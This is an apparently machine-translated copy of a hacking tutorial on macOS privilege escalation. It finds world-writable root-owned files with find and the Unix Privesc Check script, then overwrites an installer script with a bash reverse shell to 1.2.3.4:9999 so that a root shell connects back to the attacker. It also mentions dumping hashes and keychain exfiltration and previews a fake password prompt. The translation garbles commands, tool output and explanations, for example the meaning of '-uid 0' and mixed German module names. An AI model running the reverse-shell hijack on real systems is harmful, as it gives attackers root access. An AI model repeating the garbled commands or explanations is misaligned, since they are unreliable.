قالب وردپرس درنا توس
Home / Tips and Tricks / How to Perform Privilege Escalation, Part 1 (Abuse of File Permissions) by «Null Byte :: WonderHowTo

How to Perform Privilege Escalation, Part 1 (Abuse of File Permissions) by «Null Byte :: WonderHowTo



Most MacOS hacks use a non-root terminal to create a backdoor to the device. As a low-privileged user, a lot of damage can be done, but it has its limitations. Think twice about authorizing a file to run – an attacker could turn your innocent scripts into permanent root backdoors.

As a low-privilege user, we can perform a variety of attacks, including z and live streaming of the target's desktop in real time. But dumping user login hashes, exfiltrating keychain data, changing master files, and running multiple empire modules requiring root privileges.

The method in this article does not require input from the target MacOS user, which works well if you try to go undetected. However, it may take a bit of luck to succeed because misconfigured files may not be present on the target MacBook or another Mac computer. The idea here is simple: An attacker thoroughly scans the Mac for files with overly-permitted attributes and rewrites the contents of the files to execute malicious code as the root user.

The second method (shown later in this guide), The attacker must invoke a convincing pop-up window that prompts the user for their password. The following is an example of an attacker's iTunes prompt.

Readers interested in the prompting method can jump to my next guide. However, immediate technique should be a last resort as it requires input from the target user and may cause suspicion in them or their antivirus software. For this reason, I will first show how to find files with dangerous permissions.

By default, macOS has no root files that normal users can access. Here's why a little luck is needed. If the target user installs software and manages data over time, it is possible that some files were intentionally created or modified to gain insecure permissions. For example, an application developer or user might create an executable that belongs to root but allows a user with lower privileges to modify and execute the content. This is standard on installation and support scripts designed to install additional software or automate repetitive tasks.

Before proceeding, readers unfamiliar with Unix operating systems should become familiar with file permissions and UIDs. Being able to identify vulnerable files is very dependent on how file ownership, group memberships, and permissions work.

Option 1. Find files with dangerous permissions (fast and dirty)

To find Files that use insecure file permissions, we quickly analyze each file on the target device for specific attributes. Let's take a look at the command, and I'll break down each argument one by one.

  find / -uid 0 -type f -perm -333 2> / dev / null -exec ls -l {} ; 
  • Find considers every single file on the device when / is used. To minimize the scope of the search (which is not recommended), this path may be something like / etc / or / Users /.
  • The following -uid 0 argument will omit the files associated with root user; This does not necessarily mean only files created by "root". It is not uncommon for ordinary users (at some point) to create or increase their user account to uid 0, giving them full root access indefinitely.
  • To omit directories, the -type argument is used to instruct only to show files ( f ).
  • The argument -Per may be the most important part of this entire command. It is instructed to show only files with permissions ( -333 ) that are writable and executable.
  • Argument 2> / dev / null omits error messages in the terminal. Without it, Find will report hundreds of errors as it searches root files and directories. It is not critical to the command, but makes the output clearer and free of annoying error messages.
  • Finally, it is executed for each file discovered by find ( -exec … {} ; ) ls command to list the attributes of each file ( -l ). Below is an example output.
  -rwxrwxrwx 1 Root Wheel 882K Jul 14 23:57 /Users/tokyoneon/Downloads/setup.py
-rwxrwxrwx 1 Permanent staff 610K Aug 1 22:27 /Users/tokyoneon/Desktop/test.sh
-rwxrwxrwx 1 Root Wheel 4M Jul 19 23:03 /opt/installer.sh

Each user, regardless of the UID, can read, write, and execute these files ( rwxrwxrwx ) root user. For a low priority backdoor, we now just need to change the contents of the file ( echo ) to create a new (root) backdoor.

  echo & # 39; bash -i> & / dev / tcp /1.2.3.4/9999 0> & 1 & # 39;> /opt/installer.sh

This bash command generates a reverse TCP Shell connection to the attacker's machine ( 1.2.3.4 ) at port 9999 . By overriding (> ) the contents of the installer.sh script with this command, the program executes the Bash command with root privileges. I am using a small Bash command here because it is shorter than the Tclsh command and better demonstrates how to enter code from a terminal into a script. But we can easily replace the bash command with a one-liner to create a new root backdoor.

To execute the hijacked installer script, use the following command attached with & to run it as a background process

  /opt/installer.sh & 

Back on the attacker's machine a new root netcat shell has been created.

Option 2. Use Unix Privesc Check (Slow and Comprehensive)

Unix Privesc Check (UPC) is one of several open source projects developed for enumeration of permissions. UPC provides the ability to search for read, write, and execute permissions on sensitive files, list users without a password, and much more, as we'll see shortly.

To use UPC from a low We will first switch ( cd ) to the / tmp directory and download the UPC ZIP with curl .

  cd / tmp /
curl -L https://github.com/inquisb/unix-prives-c-check/archive/master.zip -o master.zip 

The argument -L will entice follow download redirects During the -o argument, curl says to save the ZIP file to a local file. Both arguments are required.

When done, unzip the contents of master.zip

  extract master.zip

Archive: master.zip
29db4cfff5ae6b4bee10e1c4279e58ccbf03ad16
Creation: unix-privesc-check-master /
Inflate: unix-privesc-check-master / README.md
Creation: unix-privesc-check-master / checks /
bloat: unix-privesc-check-master / checks / credentials
Inflate: unix-privesc-check-master / checks / devices_options
Inflate: unix-privesc-check-master / checks / devices_permission
Creation: unix-privesc-check-master / checks / activated /
Creation: unix-privesc-check-master / checks / activated / all /
Linking: unix-privesc-check-master / checks / enabled / all / credentials -> ../../credentials
Linking: unix-privesc-check-master / checks / enabled / all / devices_options -> ../../devices_options
Linking: unix-privesc-check-master / checks / enabled / all / devices_permission -> ../../devices_permission
Linking: unix-privesc-check-master / checks / enabled / all / gpg_agent -> ../../gpg_agent
Linking: unix-privesc-check-master / checks / enabled / all / group_writable -> ../../group_writable
Linking: unix-privesc-check-master / checks / enabled / all / history_readable -> ../../history_readable
Linking: unix-privesc-check-master / checks / activated / all / homedirs_executable -> ../../homedirs_executable
Linking: unix-privesc-check-master / checks / enabled / all / homedirs_writable -> ../../homedirs_writable
Linking: unix-privesc-check-master / checks / enabled / all / jar -> ../../jar
Linking: unix-privesc-check-master / checks / enabled / all / key_material -> ../../key_material
Linking: unix-privesc-check-master / checks / enabled / all / ldap_authentication -> ../../ldap_authentication
Linking: unix-privesc-check-master / checks / enabled / all / nis_authentication -> ../../nis_authentication
Shortcut: unix-privesc-check-master / validates / activates / all / passwd_hashes -> ../../passwd_hashes

......

unix-privesc-check-master / validates / activates / attack_surface / world_writable -> ../../world_writable
unix-privesc-check-master / checks / enabled / sdl / privileged_banned -> ../../privileged_banned
unix-privesc-check-master / checks / activates / sdl / privileged_privilegien -> ../../privileged_change_privileges
unix-privesc-check-master / checks / enabled / sdl / privileged_chroot -> ../../privileged_chroot
unix-privesc-check-master / checks / enabled / sdl / privileged_dependence -> ../../privileged_dependency
unix-privesc-check-master / checks / enabled / sdl / privileged_nx -> ../../privileged_nx
unix-privesc-check-master / checks / activates / sdl / privileged_path -> ../../privileged_path
unix-privesc-check-master / checks / activated / sdl / privilegierte_pie -> ../../privileged_pie
unix-privesc-check-master / checks / enabled / sdl / privileged_random -> ../../privileged_random
unix-privesc-check-master / checks / enabled / sdl / privileged_relro -> ../../privileged_relro
unix-privesc-check-master / checks / enabled / sdl / privileged_path -> ../../privileged_rpath
unix-privesc-check-master / checks / activates / sdl / privilegiert_ssp -> ../../privileged_ssp
unix-privesc-check-master / checks / activates / sdl / privileged_tmp -> ../../privileged_tmp
unix-privesc-check-master / checks / enabled / sdl / privileged_writable -> ../../privileged_writable

Change to the newly created unix-privesc-check-master / directory.

  cd unix-privivesc check-master / 

Use the command – help to display the available arguments and options of UPC.

  ./upc.sh --help

unix-privesc-check v2.1-dev (https://github.com/inquisb/unix-prives-c-check)

Shell script for creating a check and checking for permission escalation vectors on UNIX systems.

Usage: ./upc.sh

--Help this help display and exit
--version display version and exit
--Color allows the output of colors
--verbose verbosity level (0-2, default: 1)
- Select one of the following check types:
all
attack surface
SDL
--checks provide a comma-separated list of the checks to be performed, select from the following checks:
credentials
device options
devices_permission
gpg_agent
Gruppenschreibbar
history_readable
homedirs_executable
homedirs_writable
jug
Schlüssel_Material
ldap_authentication
nis_authentifizierung
passwd_hashes
postgresql_configuration
postgresql_connection
postgresql_trust
privilegierte_argumente
privilegiert_banned
privileged_change_privileges
privilegierte_chroot
privilegierte_Abhängigkeit
privileged_environment_variables
privilegierte_nx
privilegierter_pfad
privilegierte_pie
privileged random number
privilegiertes_relro
privilegierter_rpath
privilegiert_ssp
privilegierte_tmp
privilegiert_schreibbar
setgid
setuid
shadow_hashes
ssh_agent
ssh_key
sudo
system_aslr
system configuration
system_libraries
System_Map
system_nx
system_selinux
world_writable 

As we can see, nearly 50 modules (or "checks") are available to find misconfigured and overly permissive files. The following is a sample command that uses the world_writable and the privilegable_writable checks to find files that allow each user to change their content.

This process may take several hours, depending on the size of the server. Hard disk (s). It will probably also heat up the CPU of the MacBook, making the built-in fans very loud. Unfortunately, there are no features in UPC to optimize or limit the workload. If you want to avoid detection, this UPC script may not be ideal.

  ./upc.sh --color --checks world_writable, privileged_writable

unix-privesc-check v2.1-dev (https://github.com/inquisb/unix-prives-c-check)

2 I: [file] Cache generated ...
3 I: [world_writable] Starting at:
4 W: [world_writable] / Library / Caches belongs to the user root (group admin) and is writable worldwide with sticky bit (drwxrwxrwt)
5 W: [world_writable] / private / var / run / mDNSResponder belongs to the user root (group daemon) and is writable worldwide (srw-rw-rw-)
6 W: [world_writable] / private / var / run / syslog belongs to the user root (group demon) and is writable worldwide (srw-rw-rw-)
7 W: [world_writable] / private / var / run / cupsd belongs to the user root (group demon) and is writable worldwide (srwxrwxrwx)
8 W: [world_writable] / private / tmp belongs to the user root (group wheel) and is writable worldwide with Sticky Bit (drwxrwxrwt)
9 W: [world_writable] /private/tmp/com.apple.launchd.aJbbEm79Lm/Render belongs to the user tokyoneon (group wheel) and is writable worldwide (srw-rw-rw-)
10 W: [world_writable] /private/tmp/com.apple.launchd.XlO6hrECUn/Listeners belongs to the user tokyoneon (group wheel) and is writable worldwide (srw-rw-rw-)
11 W: [world_writable] / private / tmp / agvtool belongs to the user tokyoneon (group wheel) and is writable worldwide with Sticky Bit (-rwxrwxrwt)
12 W: [world_writable] / Users / Shared belongs to the user root (group wheel) and can be described worldwide with Sticky Bit (drwxrwxrwt)
13 W: [world_writable] / Users / Shared / adi belongs to the user root (group wheel) and is writable worldwide (drwxrwxrwx)
14 W: [world_writable] /Users/tokyoneon/Downloads/setup.py belongs to user root (group staff) and is writable worldwide (-rwxrwxrwx)
15 W: [world_writable] /Users/tokyoneon/Desktop/test.sh belongs to the user tokyoneon (group staff) and is writable worldwide (-rwx-wx-wx)
16 W: [world_writable] /Users/tokyoneon/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod belongs to the user tokyoneon (group staff) and is writable worldwide (drwxrwxrwx)
17 W: [world_writable] /Users/tokyoneon/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod/MapTiles belongs to the user tokyoneon (group staff) and is writable worldwide (drwxrwxrwx)
18W: [world_writable] /Users/tokyoneon/Library/Containers/com.apple.geod/Data/Library/Caches/com.apple.geod/MapTiles/MapTiles.sqlitedb

19 .......

20 W: [world_writable] / dev / ptywc belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
21 W: [world_writable] / dev / ttywd belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
22 W: [world_writable] / dev / ptywd belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
23 W: [world_writable] / dev / ttywe belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
24 W: [world_writable] / dev / ptywe belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
25 W: [world_writable] / dev / ttywf belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
26 W: [world_writable] / dev / ptywf belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
27 W: [world_writable] / dev / ptmx belongs to the user root (group tty) and is writable worldwide (crw-rw-rw-)
28 W: [world_writable] / dev / random belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
29 W: [world_writable] / dev / urandom belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
30 W: [world_writable] / dev / dtrace belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
31 W: [world_writable] / dev / dtracehelper belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
32 W: [world_writable] / dev / lockstat belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
33 W: [world_writable] / dev / sdt belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
34 W: [world_writable] / dev / systrace belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
35 W: [world_writable] / dev / machtrace belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
36 W: [world_writable] / dev / fbt belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
37 W: [world_writable] / dev / profile belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
38 W: [world_writable] / dev / io8log belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
39 W: [world_writable] / dev / io8logtemp belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
40 W: [world_writable] /dev/cu.Bluetooth-Incoming-Port belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
41 W: [world_writable] /dev/tty.Bluetooth-Incoming-Port belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
42 W: [world_writable] / dev / autofs_nowait belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
43 W: [world_writable] / dev / autofs_notrigger belongs to the user root (group wheel) and is writable worldwide (crw-rw-rw-)
44 W: [world_writable] / dev / autofs_homedirmounter belongs to user root (group wheel) and is writable worldwide (crw-rw-rw -) 

The UPC output is heavily edited, but pay close attention to the file attributes ( -rwxrwxrwx ) at lines 14 and 15. Any detected file with "rwx" permissions requires further investigation and may allow an attacker to increase his shell.

UPC is an excellent and extremely thorough enumeration script Many of these features go beyond the scope of this article, but I encourage readers to experiment with UPC themselves and find out which modules (checks) best fit their needs.

Conclusion

Users are often too fast chmod 777 a file that gives a seemingly harmless script the ultimate power over their system. It may seem silly or overly simplistic, but finding files with explicit attributes is quite common and easily abused by attackers on your system.

If you're curious about potentially exploitable files on your MacOS device, use to find and UPC commands presented in this article. If permissive files are found, you should immediately delete them or use a more secure set of permissions to minimize the attack surface.

Next Up: How to Privilege by Password Phishing in MacOS

Cover image of Eugene / PEXELS; Screenshot of tokyoneon / Null Byte

Source link